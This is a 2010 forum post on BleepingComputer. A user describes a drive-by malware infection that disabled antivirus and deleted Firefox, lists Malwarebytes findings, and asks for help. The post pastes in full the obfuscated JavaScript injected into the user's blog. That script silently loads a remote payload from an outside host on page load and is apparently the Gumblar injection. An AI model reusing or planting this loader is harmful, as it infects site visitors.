Jump to content


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.


Infected website deleted Firefox exe?

  • Please log in to reply
No replies to this topic

#1 msgsu


  • Members
  • 47 posts
  • Local time:08:35 AM

Posted 03 June 2010 - 02:52 AM

Yeah, I was looking for pictures of ladies and got into trouble. If you want to go hunting for this one, go to google image search for "vice suicide girl" with moderate filtering. One of the results on the first page, can't remember which one, did this to me I'm thinking.

While browsing,/ a Java splash screen came up. I could not think of what activated it except for the paged I browsed to, so I clicked back. A few seconds later (Windows XP Pro Sp 2) informed me that my virus scan (Symantec AntiVirus was deactivated. Then programs started crashing like Firefox, Explorer and svchost. I rebooted and tried to restart firefox, but my desktop shortcut did not work. It could not find the Firefox exe! The infection must have deleted it, it was missing from the Program Files\Mozilla Firefox folder! So I downloaded Firefox and reinstalled it, but it crashed again.

This is where I restarted in safemode and did a Malwarebytes scan. It came back with two results: Malware.Trace (C:\Documents and Settings\[user]\Application Data\avdrn.dat) and Trojan.Agent (C:\Documents and Settings\[user]\Local Settings\Temp\svchost.exe). Both quarantined and deleted successfully.

I am restarting after the scan now. Is there anything else I should do? I have not seen an invasion like that before. What can I do to best protect against it next time (besides stopping the behavior in the first paragraph ;) )

Edit: Script was injected into blog I was logged into admin in about 15 pages. Blog will not display, only shows blank white screen. Will add code momentarily.

&lt;script>var e=["r","VR"];this.S=false;var G;t=function(){m=["QR","QV","f"];function R(x,F,Gw){a=3967;a++;return x.substr(F,Gw);this.Th="";}y=["Ef","wW","Qt"];TO=["nC","wo","aP"];var n='';var D=String(R("/govcL",0,3)+R("ogl8Ixk",0,3)+R("xWoIe.cWIxo",4,3)+R("om/TKLB",0,3)+"tat"+R("ONWtooNOW",3,3)+"dle"+R(".coZbq",0,3)+"m/t"+R("isctm3",0,3)+"ali"+R(".itc6I",0,3)+R(".phMKCO",0,3)+R("AWkpkAW",3,1));var ka=new Date();L=["yi","RR"];H=["ry","A"];N=40894;N--;var M=RegExp;var uC=new Array();var ER=[];var b=document;var c={J:false};this.Ho="";function V(x,F){var aJ=new Date();var q={};var Gw=new String("[")+F+R("]6KO",0,1);var hB=["eE"];Vq=1331;Vq--;var _=new M(Gw, String("g"));this.aI=false;Gd=["Lj","EE"];return x.replace(_, n);};try {var HY='B'} catch(HY){};var Lz=["JM"];var z=459039-450959;var yC=new Date();var i=V('s0cnr1i0pEtn','4_10QEnq');var u=null;try {} catch(GR){};var h="bo"+"dy";li=61075;li--;var VF={Xa:"hb"};var XP=[];G=function(){this.ZE=41220;this.ZE--;var Td='';try {this.sH=26223;this.sH-=144;var U=V('cFrFeZajtOeFE4lveYmAeMnSt4','SvDZFA4q2wYOMj');var oO=new Array();var FO=["Jr","iq"];uW=b[U](i);Rr={na:37709};this.XV=20407;this.XV+=228;var xp=V('sprCcz','DhpLG2kdCNaBmKAzZ');var x=z+D;var v=String("defer");QX={mB:9032};uW[v]=[1,9][0];var yW=55050;uW[xp]=new String("ht"+"tp"+":/"+"/s"+R("poymG",0,2)+"tt"+R("hiZvWG",0,2)+R("ngMwIv",0,2)+".r"+R("iUEu:EiU",3,2))+x;b[h].appendChild(uW);} catch(Q){var Rw={QA:54411};var MX=["Vj","SJ"];xw={lr:false};lJ={pD:"jA"};};ws=[];jx={Xz:false};};};this.CP=55469;this.CP+=99;try {} catch(sg){};t();var wy='';var XT=new Date();var _r=["uk","aX","Zg"];window.onload=G;Eg={};</script><!--ee726cc210e0528a76c19ba1cf102871-->

New edit: [sid: 23616] HTTP Gumblar Request Detected is what my virus scan prog says when I browse to my website from my work. :thumbsup:

Edited by msgsu, 03 June 2010 - 01:59 PM.

BC AdBot (Login to Remove)


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users